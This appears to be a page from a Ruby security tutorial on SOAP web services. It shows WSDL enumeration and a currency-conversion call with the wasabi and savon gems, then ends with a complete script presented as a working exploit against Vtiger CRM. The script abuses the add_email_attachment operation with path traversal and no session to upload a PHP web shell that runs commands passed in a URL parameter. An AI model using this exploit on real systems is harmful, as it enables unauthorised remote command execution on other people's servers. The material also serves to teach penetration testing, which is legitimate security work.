我的书签
添加书签
移除书签Interacting with Web Services
SOAP - WSDL
Generally speaking, dealing with SOAP means dealing with XML messages and a WSDL file (also XML) that describes how to use a given SOAP API. Ruby has really elegant way to do so and let’s to get our hand dirty with an exploit
- Install wasabi, sabvon & httpclient gems
gem install wasabi savon httpclient
Enumeration
require 'wasabi'url = "http://www.webservicex.net/CurrencyConvertor.asmx?WSDL"document = Wasabi.document url# Parsing the documentdocument.parser# SOAP XMLdocument.xml# Getting the endpointdocument.endpoint# Getting the target namespacedocument.namespace# Enumerate all the SOAP operations/actionsdocument.operations# Enumerate input parameters for particular operationdocument.operation_input_parameters :conversion_rate# Enumerate all available currenciesdocument.parser.document.element_children.children[1].children[1].children[3].children[1].children.map {|c| c.attributes.values[0].to_s}
Results
>> url = "http://www.webservicex.net/CurrencyConvertor.asmx?WSDL"=> "http://www.webservicex.net/CurrencyConvertor.asmx?WSDL">> document = Wasabi.document url=> #<Wasabi::Document:0x00000002c79a50 @adapter=nil, @document="http://www.webservicex.net/CurrencyConvertor.asmx?WSDL">>> # Parsing the document>> document.parser=> #<Wasabi::Parser:0x0000000281ebb8@deferred_types=[],@document=#(Document:0x140fa3c {name = "document",children = [#(Element:0x140f294 {name = "definitions",namespace = #(Namespace:0x14017e8 { prefix = "wsdl", href = "http://schemas.xmlsoap.org/wsdl/" }),attributes = [ #(Attr:0x1a507d4 { name = "targetNamespace", value = "http://www.webserviceX.NET/" })],children = [#(Text "\n "),---kipped--->> # Getting the endpoint>> document.endpoint=> #<URI::HTTP http://www.webservicex.net/CurrencyConvertor.asmx>>> # Getting the target namespace>> document.namespace=> "http://www.webserviceX.NET/">> # Enumerate all the SOAP operations/actions>> document.operations=> {:conversion_rate=>{:action=>"http://www.webserviceX.NET/ConversionRate",:input=>"ConversionRate",:output=>"ConversionRateResponse",:namespace_identifier=>"tns",:parameters=>{:FromCurrency=>{:name=>"FromCurrency", :type=>"Currency"}, :ToCurrency=>{:name=>"ToCurrency", :type=>"Currency"}}}}>> # Enumerate input parameters for particular operation>> document.operation_input_parameters :conversion_rate=> {:FromCurrency=>{:name=>"FromCurrency", :type=>"Currency"}, :ToCurrency=>{:name=>"ToCurrency", :type=>"Currency"}}
Interaction
require 'savon'url = "http://www.webservicex.net/CurrencyConvertor.asmx?WSDL"client = Savon.client(wsdl: url)message = {'FromCurrency' => 'EUR', 'ToCurrency' => 'CAD'}response = client.call(:conversion_rate, message: message).bodyresponse[:conversion_rate_response][:conversion_rate_result]
Results
>> message = {'FromCurrency' => 'EUR', 'ToCurrency' => 'CAD'}=> {"FromCurrency"=>"EUR", "ToCurrency"=>"CAD"}>> response = client.call(:conversion_rate, message: message).body=> {:conversion_rate_response=>{:conversion_rate_result=>"1.4417", :@xmlns=>"http://www.webserviceX.NET/"}}1.4415
Hacking via SOAP vulnerabilities
This is a working exploit for Vtiger CRM SOAP from auth-bypass to shell upload
#!/usr/bin/env ruby# KING SABRI | @KINGSABRI# gem install savon httpclient#require 'savon'if ARGV.size < 1puts "[+] ruby #{__FILE__} [WSDL URL]"exit 0elseurl = ARGV[0]endshell_data, shell_name = "<?php system($_GET['cmd']); ?>", "shell-#{rand(100)}.php"# Start clientclient = Savon::Client.new(wsdl: url)# List all available operationsputs "[*] List all available operations "puts client.operationsputs "\n\n[*] Interact with :add_email_attachment operation"response = client.call( :add_email_attachment,message: {emailid: rand(100),filedata: [shell_data].pack("m0"),filename: "../../../../../../#{shell_name}",filesize: shell_data.size,filetype: "php",username: "KING",sessionid: nil})puts "[+] PHP Shell on: http://#{URI.parse(url).host}/vtigercrm/soap/#{shell_name}?cmd=id"
More about Savon
